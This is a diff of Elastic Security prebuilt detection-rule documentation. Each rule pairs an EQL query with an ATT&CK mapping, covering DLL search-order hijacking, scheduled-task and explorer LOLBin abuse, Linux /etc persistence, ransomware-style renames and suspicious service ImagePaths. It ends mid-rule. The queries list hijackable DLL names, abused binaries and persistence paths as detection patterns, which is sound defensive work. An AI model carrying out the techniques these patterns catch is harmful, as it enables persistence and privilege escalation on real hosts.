analysis + +### Investigating Suspicious DLL Loaded for Persistence or Privilege Escalation + +Attackers can execute malicious code by abusing missing modules that processes try to load, enabling them to escalate privileges or gain persistence. 
This rule identifies the loading of a non-Microsoft-signed DLL that is missing on a default Windows installation or one that can be loaded from a different location by a native Windows process. + +#### Possible investigation steps + +- Examine the DLL signature and identify the process that created it. + - Investigate any abnormal behaviors by the process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve the DLL and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. 
+- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("driver", "library") or (event.category == "process" and event.action : "Image loaded*")) and + ( + /* compatible with Elastic Endpoint Library Events */ + (dll.name : ("wlbsctrl.dll", "wbemcomn.dll", "WptsExtensions.dll", "Tsmsisrv.dll", "TSVIPSrv.dll", "Msfte.dll", + "wow64log.dll", "WindowsCoreDeviceInfo.dll", "Ualapi.dll", "wlanhlp.dll", "phoneinfo.dll", "EdgeGdi.dll", + "cdpsgshims.dll", "windowsperformancerecordercontrol.dll", "diagtrack_win.dll", "oci.dll", "TPPCOIPW32.dll", + "tpgenlic.dll", "thinmon.dll", "fxsst.dll", "msTracer.dll") + and (dll.code_signature.trusted != true or dll.code_signature.exists != true)) or + + /* compatible with Sysmon EventID 7 - Image Load */ + (file.name : ("wlbsctrl.dll", "wbemcomn.dll", "WptsExtensions.dll", "Tsmsisrv.dll", "TSVIPSrv.dll", "Msfte.dll", + "wow64log.dll", "WindowsCoreDeviceInfo.dll", "Ualapi.dll", "wlanhlp.dll", "phoneinfo.dll", "EdgeGdi.dll", + "cdpsgshims.dll", "windowsperformancerecordercontrol.dll", "diagtrack_win.dll", "oci.dll", "TPPCOIPW32.dll", + "tpgenlic.dll", "thinmon.dll", "fxsst.dll", "msTracer.dll") and + 
not file.path : ("?:\\Windows\\System32\\wbemcomn.dll", "?:\\Windows\\SysWOW64\\wbemcomn.dll") and + not file.hash.sha256 : + ("6e837794fc282446906c36d681958f2f6212043fc117c716936920be166a700f", + "b14e4954e8cca060ffeb57f2458b6a3a39c7d2f27e94391cbcea5387652f21a4", + "c258d90acd006fa109dc6b748008edbb196d6168bc75ace0de0de54a4db46662") and + not file.code_signature.status == "Valid") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Search Order Hijacking +** ID: T1574.001 +** Reference URL: https://attack.mitre.org/techniques/T1574/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc new file mode 100644 index 0000000000..7c2244af4d --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc 
@@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process]] +=== Suspicious Endpoint Security Parent Process + +A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("esensor.exe", "elastic-endpoint.exe") and + process.parent.executable != null and + /* add FPs here */ + not process.parent.executable : ("C:\\Program Files\\Elastic\\*", + "C:\\Windows\\System32\\services.exe", + "C:\\Windows\\System32\\WerFault*.exe", + "C:\\Windows\\System32\\wermgr.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc new file mode 100644 index 0000000000..61c1563fbe --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc 
@@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device]] +=== Suspicious Execution from a Mounted Device + +Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ +* https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*" and + (process.working_directory : "?:\\" and not process.working_directory: "C:\\") and + process.parent.name : "explorer.exe" and + process.name : ("rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "regsvr32.exe", + "cscript.exe", "wscript.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: 
https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Sub-technique: +** Name: Regsvr32 +** ID: T1218.010 +** Reference URL: https://attack.mitre.org/techniques/T1218/010/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc new file mode 100644 index 0000000000..79d3b8eb10 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc 
@@ -0,0 +1,123 @@ +[[prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task]] +=== Suspicious Execution via Scheduled Task + +Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + /* Schedule service cmdline on Win10+ */ + process.parent.name : "svchost.exe" and process.parent.args : "Schedule" and + /* add suspicious programs here */ + process.pe.original_file_name in + ( + "cscript.exe", + "wscript.exe", + "PowerShell.EXE", + "Cmd.Exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + "REGSVR32.EXE", + "MSBuild.exe", + "InstallUtil.exe", + "RegAsm.exe", + "RegSvcs.exe", + "msxsl.exe", + "CONTROL.EXE", + "EXPLORER.EXE", + "Microsoft.Workflow.Compiler.exe", + "msiexec.exe" + ) and + /* add suspicious paths here */ + process.args : ( + "C:\\Users\\*", + "C:\\ProgramData\\*", + "C:\\Windows\\Temp\\*", + "C:\\Windows\\Tasks\\*", + "C:\\PerfLogs\\*", + "C:\\Intel\\*", + "C:\\Windows\\Debug\\*", + "C:\\HP\\*") and + + not (process.name : "cmd.exe" and process.args : "?:\\*.bat" and process.working_directory : "?:\\Windows\\System32\\") and + 
not (process.name : "cscript.exe" and process.args : "?:\\Windows\\system32\\calluxxprovider.vbs") and + not (process.name : "powershell.exe" and process.args : ("-File", "-PSConsoleFile") and user.id : "S-1-5-18") and + not (process.name : "msiexec.exe" and user.id : "S-1-5-18") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc new file mode 100644 index 0000000000..aa502fffa4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc 
@@ -0,0 +1,121 @@ +[[prebuilt-rule-8-10-5-suspicious-explorer-child-process]] +=== Suspicious Explorer Child Process + +Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "rundll32.exe", "cmd.exe", "mshta.exe", "regsvr32.exe") or + process.pe.original_file_name in ("cscript.exe", "wscript.exe", "PowerShell.EXE", "RUNDLL32.EXE", "Cmd.Exe", "MSHTA.EXE", "REGSVR32.EXE") + ) and + /* Explorer started via DCOM */ + process.parent.name : "explorer.exe" and process.parent.args : "-Embedding" and + not process.parent.args: + ( + /* Noisy CLSID_SeparateSingleProcessExplorerHost Explorer COM Class IDs */ + "/factory,{5BD95610-9434-43C2-886C-57852CC8A120}", + "/factory,{ceff45ee-c862-41de-aee2-a022c81eda92}" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: 
https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc new file mode 100644 index 0000000000..9c8062db7f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc 
@@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected]] +=== Suspicious File Changes Activity Detected + +This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Impact +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id, host.id with maxspan=1s + [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and + file.path : ( + "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Encrypted for Impact +** ID: T1486 +** Reference URL: 
https://attack.mitre.org/techniques/T1486/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc new file mode 100644 index 0000000000..67627e609d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc 
@@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence]] +=== Suspicious File Creation in /etc for Persistence + +Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ +* https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Threat: Lightning Framework +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type in ("creation", "file_create_event") and user.name == "root" and +file.path : ("/etc/ld.so.conf.d/*", "/etc/cron.d/*", "/etc/sudoers.d/*", "/etc/rc.d/init.d/*", "/etc/systemd/system/*", +"/usr/lib/systemd/system/*") and not process.executable : ("*/dpkg", "*/yum", "*/apt", "*/dnf", "*/rpm", "*/systemd", +"*/snapd", "*/dnf-automatic","*/yum-cron", "*/elastic-agent", "*/dnfdaemon-system", "*/bin/dockerd", "*/sbin/dockerd", +"/kaniko/executor", "/usr/sbin/rhn_check") and not file.extension in ("swp", "swpx", "tmp") + +---------------------------------- + +*Framework*: MITRE 
ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Initialization Scripts +** ID: T1037 +** Reference URL: https://attack.mitre.org/techniques/T1037/ +* Sub-technique: +** Name: RC Scripts +** ID: T1037.004 +** Reference URL: https://attack.mitre.org/techniques/T1037/004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Sudo and Sudo Caching +** ID: T1548.003 +** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc new file mode 100644 index 0000000000..30eeff32f1 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc 
@@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office]] +=== Suspicious Image Load (taskschd.dll) from MS Office + +Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 +* https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: 
Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc new file mode 100644 index 0000000000..ae3848b3d6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc 
@@ -0,0 +1,79 @@ +[[prebuilt-rule-8-10-5-suspicious-imagepath-service-creation]] +=== Suspicious ImagePath Service Creation + +Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" + ) and + /* add suspicious registry ImagePath values here */ + registry.data.strings : ("%COMSPEC%*", "*\\.\\pipe\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc new file mode 100644 index 0000000000..2817d399bf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc 
@@ -0,0 +1,110 @@ +[[prebuilt-rule-8-10-5-suspicious-java-child-process]] +=== Suspicious JAVA Child Process + +Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.lunasec.io/docs/blog/log4j-zero-day/ +* https://github.com/christophetd/log4shell-vulnerable-app +* https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security +* https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS 